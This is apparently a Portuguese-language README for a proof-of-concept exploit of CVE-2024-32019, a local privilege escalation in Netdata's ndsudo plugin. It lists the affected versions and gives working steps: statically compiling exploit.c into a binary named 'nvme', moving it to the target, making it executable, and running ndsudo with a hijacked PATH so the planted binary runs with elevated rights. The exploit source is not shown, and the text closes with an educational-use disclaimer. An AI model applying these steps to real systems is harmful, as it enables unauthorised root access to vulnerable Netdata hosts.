
Exploit de prova de conceito para CVE-2024-32019 demonstrando escalada de privilégio local via caminho de pesquisa não confiável no plugin ndsudo do Netdata. Inclui instruções de compilação e passos de implantação.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — escalada de privilégio local do ndsudo via caminho de pesquisa não confiável.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Transfira o binário compilado para a máquina vulnerável.
Torne-o executável:
chmod +x nvme
Explore o binário vulnerável via manipulação de PATH (use o mesmo caminho onde você carregou seu binário):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Este código de Prova de Conceito (PoC) é fornecido apenas para fins educacionais e de teste de penetração autorizados.